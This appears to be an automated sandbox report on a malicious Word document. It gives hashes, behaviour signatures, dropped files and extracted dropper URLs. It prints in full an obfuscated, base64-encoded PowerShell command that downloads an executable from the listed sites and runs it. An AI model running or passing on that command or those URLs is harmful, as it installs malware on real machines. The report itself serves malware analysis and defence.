Analysis

  • max time kernel
    101s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/09/2024, 22:53

General

  • Target

    ce19b766f1b2d8178f63e1d1bd745a63_JaffaCakes118.doc

  • Size

    194KB

  • MD5

    ce19b766f1b2d8178f63e1d1bd745a63

  • SHA1

    683370edc9b84f4ec7ea7dc38d24de3564c5f85e

  • SHA256

    9f038a3f8faa7d88948648de22b5ab1fdd3cc1d598fc1125ff950daa9fadc4b1

  • SHA512

    b41b8fff13f0fe57cf4560dd762e92740e1e092684efcf6211ff0572da3bcbb96b847970ff80b14103e11302647d86211ca1d52349a4c819129618a7abcc2e20

  • SSDEEP

    1536:2rdi1Ir77zOH98Wj2gpngh+a9NIul8oPhEPmRl6VOJ4L:2rfrzOH98ipgBIul8uWP+l6VOJ4L

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://vstbar.com/wp-admin/Hs/

exe.dropper

http://binarywebtechsolutions.com/mobile-website-designing-company-in-gurgaon/CLZ/

exe.dropper

http://shahqutubuddin.org/U/

exe.dropper

http://cybersign-001-site5.gtempurl.com/2xwzq/bve/

exe.dropper

https://star-speed.vip/wp-admin/Ttv/

exe.dropper

https://treneg.com.br/rfvmbh/a/

exe.dropper

https://cimsjr.com/hospital/x2f/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ce19b766f1b2d8178f63e1d1bd745a63_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:720
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -en JABVADMANABrAGoAeQBkAD0AKAAnAEEAcQAnACsAKAAnAHUAJwArACcAaABhAGEAJwApACsAJwBsACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAVQBzAEUAUgBwAFIAbwBmAGkATABlAFwAbQA3AGIAaQA0AE8AQwBcAFEAawByAEgAMgBaAEsAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIARQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAEMAVQBSAEkAdABgAHkAUAByAGAATwBUAGAAbwBjAE8ATAAiACAAPQAgACgAKAAnAHQAbAAnACsAJwBzACcAKQArACgAJwAxADIALAAgACcAKwAnAHQAJwApACsAKAAnAGwAcwAxACcAKwAnADEALAAnACkAKwAoACcAIAAnACsAJwB0AGwAcwAnACkAKQA7ACQAQQA4AGcAdQBtAHkAOQAgAD0AIAAoACgAJwBGAGgAZABuACcAKwAnAHMAJwApACsAJwB1ACcAKQA7ACQAQgAwADkAbABkAHYAZAA9ACgAKAAnAEkAdwAnACsAJwB3ADMAJwApACsAJwB2ACcAKwAnADYAeQAnACkAOwAkAE0AYgBiADkAbwBjAGsAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAVwBTACcAKwAoACcAeABNACcAKwAnADcAJwApACsAKAAnAGIAaQA0ACcAKwAnAG8AJwApACsAKAAnAGMAJwArACcAVwBTACcAKQArACgAJwB4ACcAKwAnAFEAawByAGgAMgAnACsAJwB6ACcAKQArACgAJwBrAFcAJwArACcAUwB4ACcAKQApACAALQByAEUAUABsAGEAYwBFACAAIAAoACcAVwBTACcAKwAnAHgAJwApACwAWwBDAGgAQQBSAF0AOQAyACkAKwAkAEEAOABnAHUAbQB5ADkAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFYAMwBnAGgAbQA2ADcAPQAoACcAUAAnACsAKAAnADAAJwArACcAbgAwACcAKQArACgAJwB0ACcAKwAnAHYAOAAnACkAKQA7ACQAQwB1AGQAagBsAGwAdwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAFQALgBXAEUAQgBjAEwASQBFAG4AVAA7ACQAWQBrADkAdgBkAGcAdQA9ACgAKAAnAGgAdAB0AHAAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AdgBzAHQAJwArACcAYgBhAHIAJwApACsAKAAnAC4AYwBvAG0AJwArACcALwAnACsAJwB3ACcAKQArACcAcAAnACsAJwAtACcAKwAoACcAYQBkACcAKwAnAG0AJwArACcAaQBuAC8AJwApACsAKAAnAEgAJwArACcAcwAvACcAKwAnACoAaAB0ACcAKQArACcAdAAnACsAJwBwADoAJwArACgAJwAvACcAKwAnAC8AYgBpACcAKQArACgAJwBuACcAKwAnAGEAcgB5AHcAZQBiAHQAJwArACcAZQAnACkAKwAoACcAYwBoAHMAbwAnACsAJwBsAHUAJwApACsAKAAnAHQAaQBvACcAKwAnAG4AcwAuAGMAJwArACcAbwAnACkAKwAnAG0ALwAnACsAKAAnAG0AbwBiAGkAbABlACcAKwAnAC0AdwBlACcAKwAnAGIAJwArACcAcwAnACkAKwAoACcAaQB0ACcAKwAnAGUAJwApACsAKAAnAC0AJwArACcAZABlAHMAaQBnACcAKQArACgAJwBuAGkAbgBnACcAKwAnAC0AYwAnACsAJwBvACcAKQArACcAbQBwACcAKwAoACcAYQBuACcAKwAnAHkAJwArACcALQBpAG4ALQAnACkAKwAoACcAZwB1ACcAKwAnAHIAZwAnACkAKwAoACcAYQBvACcAKwAnAG4ALwBDAEwAJwApACsAKAAnAFoAJwArACcALwAqAGgAdAAnACkAKwAnAHQAJwArACgAJwBwACcAKwAnADoALwAvAHMAaABhACcAKwAnAGgAcQAnACkAKwAnAHUAdAAnACsAJwB1AGIAJwArACcAdQAnACsAJwBkACcAKwAnAGQAaQAnACsAJwBuAC4AJwArACcAbwAnACsAJwByACcAKwAnAGcALwAnACsAJwBVACcAKwAnAC8AJwArACcAKgBoACcAKwAnAHQAJwArACgAJwB0AHAAJwArACcAOgAvACcAKQArACgAJwAvAGMAeQBiAGUAcgBzACcAKwAnAGkAZwAnACkAKwAoACcAbgAtACcAKwAnADAAMAAxAC0AcwBpACcAKwAnAHQAZQAnACsAJwA1AC4AZwB0ACcAKwAnAGUAJwApACsAJwBtACcAKwAnAHAAJwArACgAJwB1ACcAKwAnAHIAbAAnACkAKwAoACcALgBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACgAJwAyAHgAJwArACcAdwB6AHEAJwApACsAKAAnAC8AYgB2AGUAJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAnAC8AcwAnACsAKAAnAHQAYQAnACsAJwByAC0AJwArACcAcwBwAGUAZQAnACkAKwAnAGQAJwArACcALgB2ACcAKwAnAGkAJwArACgAJwBwAC8AJwArACcAdwBwAC0AJwApACsAKAAnAGEAZABtAGkAJwArACcAbgAnACkAKwAnAC8AJwArACcAVAAnACsAKAAnAHQAJwArACcAdgAvACoAaAAnACsAJwB0AHQAcAAnACkAKwAnAHMAJwArACcAOgAvACcAKwAoACcALwAnACsAJwB0AHIAJwApACsAJwBlACcAKwAoACcAbgBlACcAKwAnAGcAJwApACsAJwAuAGMAJwArACgAJwBvAG0ALgBiACcAKwAnAHIALwAnACsAJwByAGYAJwApACsAKAAnAHYAbQAnACsAJwBiAGgAJwArACcALwBhAC8AKgBoAHQAJwApACsAJwB0AHAAJwArACcAcwAnACsAJwA6AC8AJwArACgAJwAvAGMAaQBtACcAKwAnAHMAJwApACsAKAAnAGoAcgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGgAJwApACsAJwBvAHMAJwArACcAcAAnACsAJwBpAHQAJwArACgAJwBhAGwALwB4ACcAKwAnADIAJwArACcAZgAvACcAKQApAC4AIgBTAFAAYABMAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEYAawAxAG0AbQBuAF8APQAoACcAWQAnACsAJwAxACcAKwAoACcAaAB2AHAAJwArACcAagAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAVABmAHkAdgBqAHQAMwAgAGkAbgAgACQAWQBrADkAdgBkAGcAdQApAHsAdAByAHkAewAkAEMAdQBkAGoAbABsAHcALgAiAEQAYABPAFcAYABOAEwAYABvAGEAZABGAEkATABFACIAKAAkAFQAZgB5AHYAagB0ADMALAAgACQATQBiAGIAOQBvAGMAawApADsAJABPAGEAawB3AG0AbQBmAD0AKAAnAEIAJwArACgAJwA0ACcAKwAnAHoAZgAnACkAKwAoACcAaABlACcAKwAnAGgAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQATQBiAGIAOQBvAGMAawApAC4AIgBsAEUAbgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAyADMAMwApACAAewAmACgAJwBJAG4AdgAnACsAJwBvAGsAZQAnACsAJwAtAEkAdABlAG0AJwApACgAJABNAGIAYgA5AG8AYwBrACkAOwAkAE4AdABrAGYAbQA3AHEAPQAoACcAVwAnACsAJwBrAHgAJwArACgAJwB4AGsAJwArACcAMQBuACcAKQApADsAYgByAGUAYQBrADsAJABEAHAAdABsAGwAMgA3AD0AKAAoACcATQBqACcAKwAnAHQAJwApACsAKAAnAHkAJwArACcANQBjADUAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwAOAA3ADEAcQBkAGkAPQAoACcAVgAnACsAJwA0ACcAKwAoACcAcQBjAHQAJwArACcAdgAzACcAKQApAA==
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4624

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\TCDF475.tmp\gb.xsl

          Filesize

          262KB

          MD5

          51d32ee5bc7ab811041f799652d26e04

          SHA1

          412193006aa3ef19e0a57e16acf86b830993024a

          SHA256

          6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

          SHA512

          5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xr0lybzr.o3e.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

          Filesize

          1KB

          MD5

          574564135cabdd97564ecd0ff18ca93d

          SHA1

          9c005a7db7ddebd0a297408dc138b2425742d0a7

          SHA256

          097be5738716c78220bce44e1a43daa6a3b91328ebb81ac4e89bbbcce9df8745

          SHA512

          bb62fce88947370fb984c30b0b58722e8417159005f07d1603f3c3716646a058d2ca8f4243c54c51d78f65946db06d7c8cf2f1d168111a0bee49f7a088c3200c

        • memory/720-25-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-3-0x00007FFCA8790000-0x00007FFCA87A0000-memory.dmp

          Filesize

          64KB

        • memory/720-2-0x00007FFCA8790000-0x00007FFCA87A0000-memory.dmp

          Filesize

          64KB

        • memory/720-12-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-11-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-10-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-13-0x00007FFCA5E30000-0x00007FFCA5E40000-memory.dmp

          Filesize

          64KB

        • memory/720-9-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-15-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-250-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-19-0x00007FFCA5E30000-0x00007FFCA5E40000-memory.dmp

          Filesize

          64KB

        • memory/720-18-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-16-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-14-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-8-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-7-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-6-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-0-0x00007FFCA8790000-0x00007FFCA87A0000-memory.dmp

          Filesize

          64KB

        • memory/720-5-0x00007FFCA8790000-0x00007FFCA87A0000-memory.dmp

          Filesize

          64KB

        • memory/720-248-0x00007FFCA8790000-0x00007FFCA87A0000-memory.dmp

          Filesize

          64KB

        • memory/720-17-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-4-0x00007FFCA8790000-0x00007FFCA87A0000-memory.dmp

          Filesize

          64KB

        • memory/720-90-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-92-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-91-0x00007FFCE87AD000-0x00007FFCE87AE000-memory.dmp

          Filesize

          4KB

        • memory/720-93-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-94-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-95-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-26-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-104-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/720-249-0x00007FFCA8790000-0x00007FFCA87A0000-memory.dmp

          Filesize

          64KB

        • memory/720-1-0x00007FFCE87AD000-0x00007FFCE87AE000-memory.dmp

          Filesize

          4KB

        • memory/720-247-0x00007FFCA8790000-0x00007FFCA87A0000-memory.dmp

          Filesize

          64KB

        • memory/720-246-0x00007FFCA8790000-0x00007FFCA87A0000-memory.dmp

          Filesize

          64KB

        • memory/4624-225-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/4624-105-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/4624-68-0x00007FFCE8710000-0x00007FFCE8905000-memory.dmp

          Filesize

          2.0MB

        • memory/4624-69-0x0000025A4CEA0000-0x0000025A4CEC2000-memory.dmp

          Filesize

          136KB